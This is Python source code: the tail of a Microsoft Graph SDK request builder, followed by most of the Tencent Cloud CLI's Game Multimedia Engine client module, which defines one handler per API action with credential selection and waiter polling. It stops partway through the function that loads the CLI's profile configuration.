requestConfiguration: Configuration for the request such as headers, query parameters, and middleware options.
Returns: Optional[directory_object.DirectoryObject]
"""
if body is None:
raise Exception("body cannot be undefined")
request_info = self.to_post_request_information(
body, request_configuration
)
from .......models.o_data_errors import o_data_error
error_mapping: Dict[str, ParsableFactory] = {
"4XX": o_data_error.ODataError,
"5XX": o_data_error.ODataError,
}
if not self.request_adapter:
raise Exception("Http core is null")
from .......models import directory_object
return await self.request_adapter.send_async(request_info, directory_object.DirectoryObject, error_mapping)
def to_post_request_information(self,body: Optional[get_user_owned_objects_post_request_body.GetUserOwnedObjectsPostRequestBody] = None, request_configuration: Optional[GetUserOwnedObjectsRequestBuilderPostRequestConfiguration] = None) -> RequestInformation:
"""
Invoke action getUserOwnedObjects
Args:
body: The request body
requestConfiguration: Configuration for the request such as headers, query parameters, and middleware options.
Returns: RequestInformation
"""
if body is None:
raise Exception("body cannot be undefined")
request_info = RequestInformation()
request_info.url_template = self.url_template
request_info.path_parameters = self.path_parameters
request_info.http_method = Method.POST
request_info.headers["Accept"] = ["application/json"]
if request_configuration:
request_info.add_request_headers(request_configuration.headers)
request_info.add_request_options(request_configuration.options)
request_info.set_content_from_parsable(self.request_adapter, "application/json", body)
return request_info
@dataclass
class GetUserOwnedObjectsRequestBuilderPostRequestConfiguration():
"""
Configuration for the request such as headers, query parameters, and middleware options.
"""
# Request headers
headers: Optional[Dict[str, Union[str, List[str]]]] = None
# Request options
options: Optional[List[RequestOption]] = None | PypiClean |
/tccli-intl-en-3.0.779.1.tar.gz/tccli-intl-en-3.0.779.1/tccli/services/gme/gme_client.py | import os
import sys
import six
import json
import tccli.options_define as OptionsDefine
import tccli.format_output as FormatOutput
from tccli import __version__
from tccli.utils import Utils
from tccli.exceptions import ConfigurationError, ClientError, ParamError
from tencentcloud.common import credential
from tencentcloud.common.profile.http_profile import HttpProfile
from tencentcloud.common.profile.client_profile import ClientProfile
from tencentcloud.gme.v20180711 import gme_client as gme_client_v20180711
from tencentcloud.gme.v20180711 import models as models_v20180711
from jmespath import search
import time
def doDescribeAppStatistics(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
elif os.getenv(OptionsDefine.ENV_TKE_REGION) and os.getenv(OptionsDefine.ENV_TKE_PROVIDER_ID) and os.getenv(OptionsDefine.ENV_TKE_WEB_IDENTITY_TOKEN_FILE) and os.getenv(OptionsDefine.ENV_TKE_ROLE_ARN):
cred = credential.DefaultTkeOIDCRoleArnProvider().get_credentials()
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
if g_param[OptionsDefine.Language]:
profile.language = g_param[OptionsDefine.Language]
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.GmeClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeAppStatisticsRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DescribeAppStatistics(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyRecordInfo(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
elif os.getenv(OptionsDefine.ENV_TKE_REGION) and os.getenv(OptionsDefine.ENV_TKE_PROVIDER_ID) and os.getenv(OptionsDefine.ENV_TKE_WEB_IDENTITY_TOKEN_FILE) and os.getenv(OptionsDefine.ENV_TKE_ROLE_ARN):
cred = credential.DefaultTkeOIDCRoleArnProvider().get_credentials()
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
if g_param[OptionsDefine.Language]:
profile.language = g_param[OptionsDefine.Language]
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.GmeClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyRecordInfoRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.ModifyRecordInfo(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteRoomMember(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
elif os.getenv(OptionsDefine.ENV_TKE_REGION) and os.getenv(OptionsDefine.ENV_TKE_PROVIDER_ID) and os.getenv(OptionsDefine.ENV_TKE_WEB_IDENTITY_TOKEN_FILE) and os.getenv(OptionsDefine.ENV_TKE_ROLE_ARN):
cred = credential.DefaultTkeOIDCRoleArnProvider().get_credentials()
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
if g_param[OptionsDefine.Language]:
profile.language = g_param[OptionsDefine.Language]
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.GmeClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteRoomMemberRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DeleteRoomMember(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeApplicationData(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
elif os.getenv(OptionsDefine.ENV_TKE_REGION) and os.getenv(OptionsDefine.ENV_TKE_PROVIDER_ID) and os.getenv(OptionsDefine.ENV_TKE_WEB_IDENTITY_TOKEN_FILE) and os.getenv(OptionsDefine.ENV_TKE_ROLE_ARN):
cred = credential.DefaultTkeOIDCRoleArnProvider().get_credentials()
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
if g_param[OptionsDefine.Language]:
profile.language = g_param[OptionsDefine.Language]
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.GmeClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeApplicationDataRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DescribeApplicationData(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeRecordInfo(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
elif os.getenv(OptionsDefine.ENV_TKE_REGION) and os.getenv(OptionsDefine.ENV_TKE_PROVIDER_ID) and os.getenv(OptionsDefine.ENV_TKE_WEB_IDENTITY_TOKEN_FILE) and os.getenv(OptionsDefine.ENV_TKE_ROLE_ARN):
cred = credential.DefaultTkeOIDCRoleArnProvider().get_credentials()
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
if g_param[OptionsDefine.Language]:
profile.language = g_param[OptionsDefine.Language]
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.GmeClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeRecordInfoRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DescribeRecordInfo(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doStartRecord(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
elif os.getenv(OptionsDefine.ENV_TKE_REGION) and os.getenv(OptionsDefine.ENV_TKE_PROVIDER_ID) and os.getenv(OptionsDefine.ENV_TKE_WEB_IDENTITY_TOKEN_FILE) and os.getenv(OptionsDefine.ENV_TKE_ROLE_ARN):
cred = credential.DefaultTkeOIDCRoleArnProvider().get_credentials()
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
if g_param[OptionsDefine.Language]:
profile.language = g_param[OptionsDefine.Language]
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.GmeClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.StartRecordRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.StartRecord(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateApp(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
elif os.getenv(OptionsDefine.ENV_TKE_REGION) and os.getenv(OptionsDefine.ENV_TKE_PROVIDER_ID) and os.getenv(OptionsDefine.ENV_TKE_WEB_IDENTITY_TOKEN_FILE) and os.getenv(OptionsDefine.ENV_TKE_ROLE_ARN):
cred = credential.DefaultTkeOIDCRoleArnProvider().get_credentials()
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
if g_param[OptionsDefine.Language]:
profile.language = g_param[OptionsDefine.Language]
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.GmeClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateAppRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.CreateApp(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyAppStatus(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
elif os.getenv(OptionsDefine.ENV_TKE_REGION) and os.getenv(OptionsDefine.ENV_TKE_PROVIDER_ID) and os.getenv(OptionsDefine.ENV_TKE_WEB_IDENTITY_TOKEN_FILE) and os.getenv(OptionsDefine.ENV_TKE_ROLE_ARN):
cred = credential.DefaultTkeOIDCRoleArnProvider().get_credentials()
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
if g_param[OptionsDefine.Language]:
profile.language = g_param[OptionsDefine.Language]
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.GmeClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyAppStatusRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.ModifyAppStatus(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeTaskInfo(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
elif os.getenv(OptionsDefine.ENV_TKE_REGION) and os.getenv(OptionsDefine.ENV_TKE_PROVIDER_ID) and os.getenv(OptionsDefine.ENV_TKE_WEB_IDENTITY_TOKEN_FILE) and os.getenv(OptionsDefine.ENV_TKE_ROLE_ARN):
cred = credential.DefaultTkeOIDCRoleArnProvider().get_credentials()
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
if g_param[OptionsDefine.Language]:
profile.language = g_param[OptionsDefine.Language]
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.GmeClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeTaskInfoRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DescribeTaskInfo(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doStopRecord(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
elif os.getenv(OptionsDefine.ENV_TKE_REGION) and os.getenv(OptionsDefine.ENV_TKE_PROVIDER_ID) and os.getenv(OptionsDefine.ENV_TKE_WEB_IDENTITY_TOKEN_FILE) and os.getenv(OptionsDefine.ENV_TKE_ROLE_ARN):
cred = credential.DefaultTkeOIDCRoleArnProvider().get_credentials()
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
if g_param[OptionsDefine.Language]:
profile.language = g_param[OptionsDefine.Language]
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.GmeClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.StopRecordRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.StopRecord(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
CLIENT_MAP = {
"v20180711": gme_client_v20180711,
}
MODELS_MAP = {
"v20180711": models_v20180711,
}
ACTION_MAP = {
"DescribeAppStatistics": doDescribeAppStatistics,
"ModifyRecordInfo": doModifyRecordInfo,
"DeleteRoomMember": doDeleteRoomMember,
"DescribeApplicationData": doDescribeApplicationData,
"DescribeRecordInfo": doDescribeRecordInfo,
"StartRecord": doStartRecord,
"CreateApp": doCreateApp,
"ModifyAppStatus": doModifyAppStatus,
"DescribeTaskInfo": doDescribeTaskInfo,
"StopRecord": doStopRecord,
}
AVAILABLE_VERSION_LIST = [
"v20180711",
]
def action_caller():
return ACTION_MAP
def parse_global_arg(parsed_globals):
g_param = parsed_globals
is_exist_profile = True
if not parsed_globals["profile"]:
is_exist_profile = False
g_param["profile"] = os.environ.get("TCCLI_PROFILE", "default")
configure_path = os.path.join(os.path.expanduser("~"), ".tccli")
is_conf_exist, conf_path = Utils.file_existed(configure_path, g_param["profile"] + ".configure")
is_cred_exist, cred_path = Utils.file_existed(configure_path, g_param["profile"] + ".credential")
conf = {}
cred = {}
if is_conf_exist:
conf = Utils.load_json_msg(conf_path)
if is_cred_exist:
